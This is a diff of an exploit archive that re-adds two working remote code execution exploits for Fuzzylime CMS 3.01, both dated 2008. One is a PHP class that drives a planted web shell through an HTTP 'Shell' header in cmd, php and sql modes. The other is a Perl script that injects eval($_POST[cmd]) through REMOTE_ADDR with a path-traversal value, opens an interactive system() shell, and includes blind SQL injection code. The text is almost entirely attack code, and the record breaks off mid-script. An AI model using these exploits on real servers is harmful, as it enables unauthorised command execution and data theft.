-			if(preg_match('#^(set )?mode(=| )(sql|cmd|php)$#i',$cmd,$array))
-				$this->setmode($array[3]);
-			
-			# clear data
-			elseif(preg_match('#^clear$#i',$cmd))
-				$this->clear();
-			
-			# else
-			else print $this->exec($cmd);
-			
-			print $this->prompt;
-		}
-	}
-	
-	/**
-	 * clear()
-	 * Just clears ouput, printing '\n'x50
-	 */
-	function clear()
-	{
-		print str_repeat("\n", 50);
-		return 0;
-	}
-	
-	/**
-	 * setmode()
-	 * Set mode (PHP, CMD, SQL)
-	 * You don't have to call it.
-	 * use mode=[php|cmd|sql] instead,
-	 * in the prompt.
-	 */
-	function setmode($newmode)
-	{
-		$this->mode = strtolower($newmode);
-		$this->prompt = '['.$this->phost.']['.$this->mode.']# ';
-		
-		switch($this->mode)
-		{
-			case 'cmd':
-				$this->data = 'system(\'\');';
-				break;
-			case 'php':
-				$this->data = '';
-				break;
-			case 'sql':
-				$this->data = $this->ssql
-				            . '$q = mysql_query(\'\') or print(str_repeat("-",50)."\n".mysql_error()."\n");'
-					    . 'print str_repeat("-",50)."\n";'
-					    . 'while($r=mysql_fetch_array($q,MYSQL_ASSOC))'
-					    . '{'
-					    . 	'foreach($r as $k=>$v) print " ".$k.str_repeat(" ", (20-strlen($k)))."| $v\n";'
-					    . 	'print str_repeat("-",50)."\n";'
-					    . '}';
-				break;
-		}
-		return $this->mode;
-	}
-
-	/**
-	 * exec()
-	 * Execute any query and catch the result.
-	 * You don't have to call it.
-	 */
-	function exec($cmd)
-	{
-		if(!strlen($this->data))	$shell = $cmd;
-		else                    	$shell = str_replace('', addslashes($cmd), $this->data);
-		
-		$fp = fsockopen($this->host, $this->port, &$errno, &$errstr, 30);
-		
-		$req  = "GET " . $this->page . " HTTP/1.1\r\n";
-		$req .= "Host: " . $this->host . ( $this->port!=80 ? ':'.$this->port : '' ) . "\r\n";
-		$req .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14\r\n";
-		$req .= "Shell: $shell\r\n";
-		$req .= "Connection: close\r\n\r\n";
-		
-		unset($shell);
-
-		fputs($fp, $req);
-		
-		$content = '';
-		while(!feof($fp)) $content .= fgets($fp, 128);
-		
-		fclose($fp);
-		
-		# Remove headers
-		$data    = explode("\r\n\r\n", $content);
-		$headers = array_shift($data);
-		$content = implode("\r\n\r\n", $data);
-		
-		if(preg_match("#Transfer-Encoding:.*chunked#i", $headers))
-			$content = $this->unchunk($content);
-	
-		preg_match($this->regex, $content, $data);
-		
-		if($data[1][ strlen($data)-1 ] != "\n") $data[1] .= "\n";
-		
-		return $data[1];
-	}
-	
-	/**
-	 * unchunk()
-	 * This function aims to remove chunked content sizes which
-	 * are putted by apache server when it uses chunked
-	 * transfert-encoding.
-	 */
-	function unchunk($data)
-	{
-		$dsize  = 1;
-		$offset = 0;
-		
-		while($dsize>0)
-		{
-			$hsize_size = strpos($data, "\r\n", $offset) - $offset;
-			
-			$dsize = hexdec(substr($data, $offset, $hsize_size));
-			
-			# Remove $hsize\r\n from $data
-			$data = substr($data, 0, $offset) . substr($data, ($offset + $hsize_size + 2) );
-			
-			$offset += $dsize;
-			
-			# Remove the \r\n before the next $hsize
-			$data = substr($data, 0, $offset) . substr($data, ($offset+2) );
-		}
-		
-		return $data;
-	}
-}
-
-?>
-
-# milw0rm.com [2008-07-12]
+#!/usr/bin/php
+') );
+
+$shell = new phpreter($url.'code/polls/titles.inc.php', '-:-:-(.*)-:-:-', 'cmd', array(), false);
+
+function get($url)
+{
+	$infos = parse_url($url);
+	$host = $infos['host'];
+	$port = isset($infos['port']) ? $infos['port'] : 80;
+	
+	$fp = fsockopen($host, $port, &$errno, &$errstr, 30);
+	
+	$req  = "GET $url HTTP/1.1\r\n";
+	$req .= "Host: $host\r\n";
+	$req .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14\r\n";
+	$req .= "Connection: close\r\n\r\n";
+
+	fputs($fp,$req);
+	fclose($fp);
+}
+
+/*
+ * Copyright (c) real
+ *
+ * This program is free software; you can redistribute it and/or 
+ * modify it under the terms of the GNU General Public License 
+ * as published by the Free Software Foundation; either version 2 
+ * of the License, or (at your option) any later version. 
+ * 
+ * This program is distributed in the hope that it will be useful, 
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of 
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the 
+ * GNU General Public License for more details. 
+ * 
+ * You should have received a copy of the GNU General Public License 
+ * along with this program; if not, write to the Free Software 
+ * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.
+ *
+ * TITLE:          PHPreter
+ * AUTHOR:         Charles "real" F. 
+ * VERSION:        1.0
+ * LICENSE:        GNU General Public License
+ *
+ * This is a really simple class with permits to exec SQL, PHP or CMD
+ * on a remote host using the HTTP "Shell" header.
+ *
+ *
+ * Sample code:
+ * [host][sql]# mode=cmd
+ * [host][cmd]# id
+ * uid=2176(u47170584) gid=600(ftpusers)
+ * 
+ * [host][cmd]# mode=php
+ * [host][php]# echo phpversion();
+ * 4.4.8
+ * [host][php]# mode=sql
+ * [host][sql]# SELECT version(), user()
+ * --------------------------------------------------
+ *  version()           | 5.0.51a-log
+ *  user()              | dbo225004932@74.208.16.148
+ * --------------------------------------------------
+ * 
+ * [host][sql]#
+ *
+ */
+
+class phpreter
+{
+	var $url;
+	var $host;
+	var $port;
+	var $page;
+	
+	var $mode;
+	
+	var $ssql;
+	
+	var $prompt;
+	var $phost;
+	
+	var $regex;
+	var $data;
+	
+	/**
+	 * __construct()
+	 *
+	 * @param url      The url of the remote shell.
+	 * @param regexp   The regex to catch cmd result.
+	 * @param mode     Mode: php, sql or cmd.
+	 * @param sql      An array with the file to include,
+	 *                 and sql vars
+	 * @param clear    Determines if clear() is called
+	 *                 on startup
+	 */
+	function __construct($url, $regexp='^(.*)$', $mode='cmd', $sql=array(), $clear=true)
+	{
+		$this->url = $url;
+		
+		$this->regex = '#'.$regexp.'#is';
+		
+		#
+		# Set data
+		#
+		
+		$infos         =	parse_url($this->url);
+		$this->host    =	$infos['host'];
+		$this->port    =	isset($infos['port']) ? $infos['port'] : 80;
+		$this->page    =	$infos['path'];
+		unset($infos);
+		
+		# www.(site).com
+		$host_tmp      =	explode('.',$this->host);
+		$this->phost   =	$host_tmp[ count($host_tmp)-2 ];
+		unset($host_tmp);
+		
+		#
+		# Set up MySQL connection string
+		#
+		if(!sizeof($sql))
+			$this->ssql = '';
+		elseif(sizeof($sql)==5)
+		{
+			$this->ssql = "include('$sql[0]');"
+			            . "mysql_connect($sql[1], $sql[2], $sql[3]);"
+				    . "mysql_select_db($sql[4]);";
+		}
+		else
+		{
+			$this->ssql = ""
+			            . "mysql_connect('$sql[0]', '$sql[1]', '$sql[2]');"
+				    . "mysql_select_db('$sql[3]');";
+		}
+		
+		$this->setmode($mode);
+		
+		#
+		# Main Loop
+		#
+
+		if($clear) $this->clear();
+		print $this->prompt;
+
+		while( !preg_match('#^(quit|exit|close)$#i', ($cmd = trim(fgets(STDIN)))) )
+		{
+			# change mode
+			if(preg_match('#^(set )?mode(=| )(sql|cmd|php)$#i',$cmd,$array))
+				$this->setmode($array[3]);
+			
+			# clear data
+			elseif(preg_match('#^clear$#i',$cmd))
+				$this->clear();
+			
+			# else
+			else print $this->exec($cmd);
+			
+			print $this->prompt;
+		}
+	}
+	
+	/**
+	 * clear()
+	 * Just clears ouput, printing '\n'x50
+	 */
+	function clear()
+	{
+		print str_repeat("\n", 50);
+		return 0;
+	}
+	
+	/**
+	 * setmode()
+	 * Set mode (PHP, CMD, SQL)
+	 * You don't have to call it.
+	 * use mode=[php|cmd|sql] instead,
+	 * in the prompt.
+	 */
+	function setmode($newmode)
+	{
+		$this->mode = strtolower($newmode);
+		$this->prompt = '['.$this->phost.']['.$this->mode.']# ';
+		
+		switch($this->mode)
+		{
+			case 'cmd':
+				$this->data = 'system(\'\');';
+				break;
+			case 'php':
+				$this->data = '';
+				break;
+			case 'sql':
+				$this->data = $this->ssql
+				            . '$q = mysql_query(\'\') or print(str_repeat("-",50)."\n".mysql_error()."\n");'
+					    . 'print str_repeat("-",50)."\n";'
+					    . 'while($r=mysql_fetch_array($q,MYSQL_ASSOC))'
+					    . '{'
+					    . 	'foreach($r as $k=>$v) print " ".$k.str_repeat(" ", (20-strlen($k)))."| $v\n";'
+					    . 	'print str_repeat("-",50)."\n";'
+					    . '}';
+				break;
+		}
+		return $this->mode;
+	}
+
+	/**
+	 * exec()
+	 * Execute any query and catch the result.
+	 * You don't have to call it.
+	 */
+	function exec($cmd)
+	{
+		if(!strlen($this->data))	$shell = $cmd;
+		else                    	$shell = str_replace('', addslashes($cmd), $this->data);
+		
+		$fp = fsockopen($this->host, $this->port, &$errno, &$errstr, 30);
+		
+		$req  = "GET " . $this->page . " HTTP/1.1\r\n";
+		$req .= "Host: " . $this->host . ( $this->port!=80 ? ':'.$this->port : '' ) . "\r\n";
+		$req .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14\r\n";
+		$req .= "Shell: $shell\r\n";
+		$req .= "Connection: close\r\n\r\n";
+		
+		unset($shell);
+
+		fputs($fp, $req);
+		
+		$content = '';
+		while(!feof($fp)) $content .= fgets($fp, 128);
+		
+		fclose($fp);
+		
+		# Remove headers
+		$data    = explode("\r\n\r\n", $content);
+		$headers = array_shift($data);
+		$content = implode("\r\n\r\n", $data);
+		
+		if(preg_match("#Transfer-Encoding:.*chunked#i", $headers))
+			$content = $this->unchunk($content);
+	
+		preg_match($this->regex, $content, $data);
+		
+		if($data[1][ strlen($data)-1 ] != "\n") $data[1] .= "\n";
+		
+		return $data[1];
+	}
+	
+	/**
+	 * unchunk()
+	 * This function aims to remove chunked content sizes which
+	 * are putted by apache server when it uses chunked
+	 * transfert-encoding.
+	 */
+	function unchunk($data)
+	{
+		$dsize  = 1;
+		$offset = 0;
+		
+		while($dsize>0)
+		{
+			$hsize_size = strpos($data, "\r\n", $offset) - $offset;
+			
+			$dsize = hexdec(substr($data, $offset, $hsize_size));
+			
+			# Remove $hsize\r\n from $data
+			$data = substr($data, 0, $offset) . substr($data, ($offset + $hsize_size + 2) );
+			
+			$offset += $dsize;
+			
+			# Remove the \r\n before the next $hsize
+			$data = substr($data, 0, $offset) . substr($data, ($offset+2) );
+		}
+		
+		return $data;
+	}
+}
+
+?>
+
+# milw0rm.com [2008-07-12]
diff --git a/platforms/php/webapps/6054.pl b/platforms/php/webapps/6054.pl
index d41d8e68c..323a4a6b5 100755
--- a/platforms/php/webapps/6054.pl
+++ b/platforms/php/webapps/6054.pl
@@ -1,383 +1,383 @@
-#!/usr/bin/perl 
-#!!UPDATED!!!!UPDATED!!!!UPDATED!!!!UPDATED!!!!UPDATED!!!!UPDATED!!!!UPDATED!!
-#after i noticed that there was a problem changing $cmd,i fixed it.this is the result.
-##
-## Fuzzylime 3.01 Remote Code Execution
-## Credits: real and inphex
-##
-## [C:\]# perl ye.pl host /path/
-## :>id
-## uid=63676(dswrealty) gid=888(vusers) groups=33(www-data)
-##
-
-use LWP::UserAgent;
-use HTTP::Cookies;
-use Switch;
-
-
-$host_ = "http://".shift;
-$path_ = shift;
-$info{'info'} = { 
-	"description" => ["#################################################\nFuzzyLime Remote Code Execution\n#################################################\nreal & inphex\n"],
-	"options" =>
-	{
-		"agent" => "",  
-		"proxy" => "",  
-		"default_headers" => [  
-			["key","value"]], 
-		"timeout" => 2, 
-		"cookie" =>     
-		{
-			"cookie" => [""],
-		},
-	},
-	"sending_options" =>
-	{
-			"host" => $host_, 
-			"path" => $path_."code/polladd.php",  
-		    "port" => 80,                  
-			"method_a" => "REMOTE_CODE_EXECUTION",  
-			"attack" =>
-		{
-    			"poll" => ["get","poll","....//swear"],
-				"log" => ["get","log","1"],
-				"_SERVER[REMOTE_ADDR]" => ["get","_SERVER[REMOTE_ADDR]","\";eval(\"\$_POST[cmd]\"); ?>"],
-		},
-	},
-
-};
-
-&start($info{'info'},222);
-
-while () {
-	print ":>";
-	$cmd = ;
-	chomp($cmd);
-	$info1{'info1'} = { "options" =>{"agent" => "",  "proxy" => "",  "default_headers" => [  ["key","value"]], "timeout" => 2, "cookie" =>     {"cookie" => [""],},},"sending_options" =>{"host" => $host_, "path" => $path_."code/polls/swear.inc.php",  "port" => 80,                  "method_a" => "REMOTE_CODE_EXECUTION",  "attack" =>{
-    			"cmd" => ["post","cmd","system('".$cmd."');"],},},};
-	&start($info1{'info1'},221);
-	print ${$info1{'info1'}}{221}{'content'};
-}
-
-
-sub start
-{
-	
-	$a_ = shift;
-	$id = shift;
-	$post_dA = "";
-	$get_dA = get_d_p_s("get");
-	$post_dA = get_d_p_s("post");
-
-	my ($x,$c,$m,$h,$ff,$kf,$hp,$c,$cccc) = (0,0,0,0,0,0,0,0,0);
-    $jj = 1;
-	$ii = 48;
-    $hh = 1;
-	$ppp = 0;
-	$s = shift;
-	$a = "";
-	$res_p = "";
-	$h = "";
-	$ua= "";
-	$agent= "";
-	$k= "";
-	$v= "";
-	$get_data= "";
-	$post_data= "";
-	$header_dA = "";
-	$h_host_h_xdsjaop = $a_->{'sending_options'}{'host'};
-	$h_path_h_xdsjaop = $a_->{'sending_options'}{'path'};
-	$h_port_h_xdsjaop = $a_->{'sending_options'}{'port'};
-	$method_m = $a_->{'sending_options'}{'method_a'};
-	$ua = LWP::UserAgent->new;
-	$ua->timeout($a_->{'options'}{'timeout'});  
-	if ($a_->{'options'}{'proxy'}) {
-	    $ua->proxy(['http', 'ftp'] => $a_->{'options'}{'proxy'});
-	}
-	$agent = $a_->{'options'}{'agent'} || "Mozilla/5.0"; 
-	$ua->agent($agent); 
-	{                                                 
-		while (($k,$v) = each(%{$a_}))
-			{
-			if ($k ne "options" && $k ne "sending_options")
-				{
-				foreach $r (@{$a_->{$k}})
-					{
-						print $a_->{$k}[0];
-					}
-				}
-			}
-
-
-		foreach $j (@{$a_->{'options'}{'default_headers'}})
-			{    
-			$ua->default_headers->push_header($a_->{'options'}{'default_headers'}[$m][0] => $a_->{'options'}{'default_headers'}[$m][1]);
-			$m++;
-			}
-
-		if ($a_->{'options'}{'cookie'}{'cookie'}[0])
-			{          
-			$ua->default_headers->push_header('Cookie' => $a_->{'options'}{'cookie'}{'cookie'}[0]);
-			}
-
-			
-
-	}
-	switch ($method_m)        
-	{
-		case "attack" { &attack();}
-		case "SQL_INJECTION_BLIND" { &sql_injection_blind();}
-		case "REMOTE_COMMAND_EXECUTION" { &attack();}
-		case "REMOTE_CODE_EXECUTION" {&attack();}
-		case "REMOTE_FILE_INCLUSION" { &attack();}
-		case "LOCAL_FILE_INCLUSION" { &attack(); }
-		else { &attack(); }  
-
-	}
-
-
-	sub attack
-	{
-		my ($jj);
-		my ($h);
-		my($x);
-		if ($post_dA eq "") {
-			$method = "get";
-		} elsif ($post_dA ne "")
-		{
-			$method = "post";
-		}
-		if ($method eq "get") {  
-			$res_p = get_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$get_dA);
-			${$a_}{$id}{'content'} = $res_p;
-			foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
-				{
-				$res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/;
-				
-				while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1])
-					{
-					if (${$jj} ne "")
-						{
-						${$a_}{$id}{'regex'}[$h][$x] = ${$jj};
-						$x++;
-						}
-						$jj++;
-					}
-					
-					$h++;
-				}
-		} elsif ($method eq "post")
-		{
-			$res_p = post_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$get_dA,"application/x-www-form-urlencoded",$post_dA);
-		
-			${$a_}{$id}{'content'} = $res_p;
-
-			foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
-				{
-				$res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/;
-				while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1])
-					{
-					if (${$jj} ne "")
-						{
-						${$a_}{$id}{'regex'}[$h][$x] = ${$jj};
-						$x++;
-						}
-						$jj++;
-					}
-					$h++;
-				}
-		}
-
-	}
-	sub sql_injection_blind
-	{
-		while ()
-			{
-			while ($ii <= 120)
-				{
-				
-				$itsx = "[".chr($ii)."]";
-				$l = length($itsx);
-				$b = ("\b")x$l;
-				syswrite STDOUT,$b.$itsx;
-
-				if(check($ii,$hh) == 1)
-				{
-					syswrite STDOUT,$b.chr($ii)."---";
-					$hh++;
-					$chr = $chr.chr($ii);
-					}
-					$ii++;
-			}
-			push(@ffs,length($chr)); 
-			if (($#ffs - 999) == $ffs)
-				{
-				exit;
-				}
-				$ii = 48;
-		}
-	}
-	sub check($$)
-	{
-		my ($h);
-		my ($a);
-		$ii = shift;
-		$hh = shift;
-
-		if (get_d_p_s("post") ne "")
-			{
-			$method = "post";
-		} else { $method = "get";}
-		if ($method eq "get")
-			{
-			$ppp++;
-			$query = modify($get_dA,$ii,$hh);
-			$res_p = get_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query);
-
-			foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
-				{
-				if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/)
-					{
-					if ($a_->{'sending_options'}{'attack'}{'regex'}[$h][2] == 1) {
-						return 1;
-					} else { return 0;}
-					}
-					else 
-				{
-						if ($a_->{'sending_options'}{'attack'}{'regex'}[$h][2] == 1) {
-							return 0;
-						}else { return 1;}
-	
-						
-				}
-				$h++;
-			}
-		} elsif ($method eq "post")
-			{
-			$ppp++;
-			$query_g = modify($get_dA,$ii,$hh);
-			$query_p = modify($post_dA,$ii,$hh);
-			
-			$res_p = post_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query_g,"application/x-www-form-urlencoded",$query_p);
-			foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
-				{
-				if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/)
-					{
-					return 1;
-					}
-					else 
-					{
-						return 0;
-					}
-				$h++;
-			}
-		}
-	}
-    sub modify($$$)
-	{
-	    $string = shift;
-	    $replace_by = shift;
-	    $replace_by1 = shift;
-
-	    if ($string !~/\$i/ && $string !~/\$h/) {
-		    return $string;
-	        } elsif ($string !~/\$i/)
-		{
-		        $ff = substr($string,0,index($string,"\$h"));
-	            $ee =  substr($string,rindex($string,"\$h")+2);
-	            $string = $ff.$replace_by1.$ee;
-
-	            return $string;
-		} elsif ($string !~/\$h/)
-		{
-	        $f = substr($string,0,index($string,"\$i"));
-	        $e = substr($string,rindex($string,"\$i")+2);
-	        $string = $f.$replace_by.$e;
-		    return $string;
-		} else
-		{
-		    $f = substr($string,0,index($string,"\$i"));
-	        $e = substr($string,rindex($string,"\$i")+2);
-	        $string = $f.$replace_by.$e;
-
-		    $ff = substr($string,0,index($string,"\$h"));
-	        $ee =  substr($string,rindex($string,"\$h")+2);
-	        $string = $ff.$replace_by1.$ee;
-
-		    return $string;
-		}
-	}
-	sub get_d_p_s
-	{
-		$k = 0;
-		$v = 0;
-		$g_d_p_s = shift;
-
-		@post = ();
-		@get = ();
-		
-		$post_data = "";
-		$get_data = "";
-		$header_data = "";
-		%header_dA = ();
-		$p = "";
-		$g = "";
-		while (($k,$v) = each(%{$a_->{'sending_options'}{'attack'}}))
-			{
-			if ($a_->{'sending_options'}{'attack'}{$k}[0] =~/post/)
-				{
-				$p .= $a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]."&";
-				} elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~/get/) {
-					$g .= $a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]."&";
-				} elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "header")
-				{
-				        $header_dA{$a_->{'sending_options'}{'attack'}{$k}[1]} = $a_->{'sending_options'}{'attack'}{$k}[2];
-				}
-			}
-		if ($g_d_p_s eq "get")
-			{
-			return $g;
-			}
-			elsif ($g_d_p_s eq "post")
-		{
-			return $p;
-		} elsif ($g_d_p_s eq "header")
-		{
-			return %header_dA;
-		}
-
-			@a_ = ();
-	}
-	sub get_data
-	{
-		$h_host_h_xdsjaop = shift;
-		$h_path_h_xdsjaop = shift;
-		%hash = get_d_p_s("header");
-	    while (($u,$c) = each(%hash))
-			{
-			$ua->default_headers->push_header($u => $c);
-			}
-		$req = $ua->get($h_host_h_xdsjaop.":".$a_->{'sending_options'}{'port'}.$h_path_h_xdsjaop);
-		return $req->content;
-	}
-	sub post_data
-	{
-		$h_host_h_xdsjaop = shift;
-		$h_path_h_xdsjaop = shift;
-		$content_type = shift;
-		$send = shift;
-		%hash = get_d_p_s("header");
-	    while (($u,$c) = each(%hash))
-			{
-		    $ua->default_headers->push_header($u => $c);
-			}
-		$req = HTTP::Request->new(POST => $h_host_h_xdsjaop.":".$a_->{'sending_options'}{'port'}.$h_path_h_xdsjaop);
-		$req->content_type($content_type);
-		$req->content($send);
-		$res = $ua->request($req);
-		return $res->content;
-	}
-
-}
-
-# milw0rm.com [2008-07-12]
+#!/usr/bin/perl 
+#!!UPDATED!!!!UPDATED!!!!UPDATED!!!!UPDATED!!!!UPDATED!!!!UPDATED!!!!UPDATED!!
+#after i noticed that there was a problem changing $cmd,i fixed it.this is the result.
+##
+## Fuzzylime 3.01 Remote Code Execution
+## Credits: real and inphex
+##
+## [C:\]# perl ye.pl host /path/
+## :>id
+## uid=63676(dswrealty) gid=888(vusers) groups=33(www-data)
+##
+
+use LWP::UserAgent;
+use HTTP::Cookies;
+use Switch;
+
+
+$host_ = "http://".shift;
+$path_ = shift;
+$info{'info'} = { 
+	"description" => ["#################################################\nFuzzyLime Remote Code Execution\n#################################################\nreal & inphex\n"],
+	"options" =>
+	{
+		"agent" => "",  
+		"proxy" => "",  
+		"default_headers" => [  
+			["key","value"]], 
+		"timeout" => 2, 
+		"cookie" =>     
+		{
+			"cookie" => [""],
+		},
+	},
+	"sending_options" =>
+	{
+			"host" => $host_, 
+			"path" => $path_."code/polladd.php",  
+		    "port" => 80,                  
+			"method_a" => "REMOTE_CODE_EXECUTION",  
+			"attack" =>
+		{
+    			"poll" => ["get","poll","....//swear"],
+				"log" => ["get","log","1"],
+				"_SERVER[REMOTE_ADDR]" => ["get","_SERVER[REMOTE_ADDR]","\";eval(\"\$_POST[cmd]\"); ?>"],
+		},
+	},
+
+};
+
+&start($info{'info'},222);
+
+while () {
+	print ":>";
+	$cmd = ;
+	chomp($cmd);
+	$info1{'info1'} = { "options" =>{"agent" => "",  "proxy" => "",  "default_headers" => [  ["key","value"]], "timeout" => 2, "cookie" =>     {"cookie" => [""],},},"sending_options" =>{"host" => $host_, "path" => $path_."code/polls/swear.inc.php",  "port" => 80,                  "method_a" => "REMOTE_CODE_EXECUTION",  "attack" =>{
+    			"cmd" => ["post","cmd","system('".$cmd."');"],},},};
+	&start($info1{'info1'},221);
+	print ${$info1{'info1'}}{221}{'content'};
+}
+
+
+sub start
+{
+	
+	$a_ = shift;
+	$id = shift;
+	$post_dA = "";
+	$get_dA = get_d_p_s("get");
+	$post_dA = get_d_p_s("post");
+
+	my ($x,$c,$m,$h,$ff,$kf,$hp,$c,$cccc) = (0,0,0,0,0,0,0,0,0);
+    $jj = 1;
+	$ii = 48;
+    $hh = 1;
+	$ppp = 0;
+	$s = shift;
+	$a = "";
+	$res_p = "";
+	$h = "";
+	$ua= "";
+	$agent= "";
+	$k= "";
+	$v= "";
+	$get_data= "";
+	$post_data= "";
+	$header_dA = "";
+	$h_host_h_xdsjaop = $a_->{'sending_options'}{'host'};
+	$h_path_h_xdsjaop = $a_->{'sending_options'}{'path'};
+	$h_port_h_xdsjaop = $a_->{'sending_options'}{'port'};
+	$method_m = $a_->{'sending_options'}{'method_a'};
+	$ua = LWP::UserAgent->new;
+	$ua->timeout($a_->{'options'}{'timeout'});  
+	if ($a_->{'options'}{'proxy'}) {
+	    $ua->proxy(['http', 'ftp'] => $a_->{'options'}{'proxy'});
+	}
+	$agent = $a_->{'options'}{'agent'} || "Mozilla/5.0"; 
+	$ua->agent($agent); 
+	{                                                 
+		while (($k,$v) = each(%{$a_}))
+			{
+			if ($k ne "options" && $k ne "sending_options")
+				{
+				foreach $r (@{$a_->{$k}})
+					{
+						print $a_->{$k}[0];
+					}
+				}
+			}
+
+
+		foreach $j (@{$a_->{'options'}{'default_headers'}})
+			{    
+			$ua->default_headers->push_header($a_->{'options'}{'default_headers'}[$m][0] => $a_->{'options'}{'default_headers'}[$m][1]);
+			$m++;
+			}
+
+		if ($a_->{'options'}{'cookie'}{'cookie'}[0])
+			{          
+			$ua->default_headers->push_header('Cookie' => $a_->{'options'}{'cookie'}{'cookie'}[0]);
+			}
+
+			
+
+	}
+	switch ($method_m)        
+	{
+		case "attack" { &attack();}
+		case "SQL_INJECTION_BLIND" { &sql_injection_blind();}
+		case "REMOTE_COMMAND_EXECUTION" { &attack();}
+		case "REMOTE_CODE_EXECUTION" {&attack();}
+		case "REMOTE_FILE_INCLUSION" { &attack();}
+		case "LOCAL_FILE_INCLUSION" { &attack(); }
+		else { &attack(); }  
+
+	}
+
+
+	sub attack
+	{
+		my ($jj);
+		my ($h);
+		my($x);
+		if ($post_dA eq "") {
+			$method = "get";
+		} elsif ($post_dA ne "")
+		{
+			$method = "post";
+		}
+		if ($method eq "get") {  
+			$res_p = get_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$get_dA);
+			${$a_}{$id}{'content'} = $res_p;
+			foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
+				{
+				$res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/;
+				
+				while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1])
+					{
+					if (${$jj} ne "")
+						{
+						${$a_}{$id}{'regex'}[$h][$x] = ${$jj};
+						$x++;
+						}
+						$jj++;
+					}
+					
+					$h++;
+				}
+		} elsif ($method eq "post")
+		{
+			$res_p = post_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$get_dA,"application/x-www-form-urlencoded",$post_dA);
+		
+			${$a_}{$id}{'content'} = $res_p;
+
+			foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
+				{
+				$res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/;
+				while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1])
+					{
+					if (${$jj} ne "")
+						{
+						${$a_}{$id}{'regex'}[$h][$x] = ${$jj};
+						$x++;
+						}
+						$jj++;
+					}
+					$h++;
+				}
+		}
+
+	}
+	sub sql_injection_blind
+	{
+		while ()
+			{
+			while ($ii <= 120)
+				{
+				
+				$itsx = "[".chr($ii)."]";
+				$l = length($itsx);
+				$b = ("\b")x$l;
+				syswrite STDOUT,$b.$itsx;
+
+				if(check($ii,$hh) == 1)
+				{
+					syswrite STDOUT,$b.chr($ii)."---";
+					$hh++;
+					$chr = $chr.chr($ii);
+					}
+					$ii++;
+			}
+			push(@ffs,length($chr)); 
+			if (($#ffs - 999) == $ffs)
+				{
+				exit;
+				}
+				$ii = 48;
+		}
+	}
+	sub check($$)
+	{
+		my ($h);
+		my ($a);
+		$ii = shift;
+		$hh = shift;
+
+		if (get_d_p_s("post") ne "")
+			{
+			$method = "post";
+		} else { $method = "get";}
+		if ($method eq "get")
+			{
+			$ppp++;
+			$query = modify($get_dA,$ii,$hh);
+			$res_p = get_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query);
+
+			foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
+				{
+				if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/)
+					{
+					if ($a_->{'sending_options'}{'attack'}{'regex'}[$h][2] == 1) {
+						return 1;
+					} else { return 0;}
+					}
+					else 
+				{
+						if ($a_->{'sending_options'}{'attack'}{'regex'}[$h][2] == 1) {
+							return 0;
+						}else { return 1;}
+	
+						
+				}
+				$h++;
+			}
+		} elsif ($method eq "post")
+			{
+			$ppp++;
+			$query_g = modify($get_dA,$ii,$hh);
+			$query_p = modify($post_dA,$ii,$hh);
+			
+			$res_p = post_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query_g,"application/x-www-form-urlencoded",$query_p);
+			foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
+				{
+				if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/)
+					{
+					return 1;
+					}
+					else 
+					{
+						return 0;
+					}
+				$h++;
+			}
+		}
+	}
+    sub modify($$$)
+	{
+	    $string = shift;
+	    $replace_by = shift;
+	    $replace_by1 = shift;
+
+	    if ($string !~/\$i/ && $string !~/\$h/) {
+		    return $string;
+	        } elsif ($string !~/\$i/)
+		{
+		        $ff = substr($string,0,index($string,"\$h"));
+	            $ee =  substr($string,rindex($string,"\$h")+2);
+	            $string = $ff.$replace_by1.$ee;
+
+	            return $string;
+		} elsif ($string !~/\$h/)
+		{
+	        $f = substr($string,0,index($string,"\$i"));
+	        $e = substr($string,rindex($string,"\$i")+2);
+	        $string = $f.$replace_by.$e;
+		    return $string;
+		} else
+		{
+		    $f = substr($string,0,index($string,"\$i"));
+	        $e = substr($string,rindex($string,"\$i")+2);
+	        $string = $f.$replace_by.$e;
+
+		    $ff = substr($string,0,index($string,"\$h"));
+	        $ee =  substr($string,rindex($string,"\$h")+2);
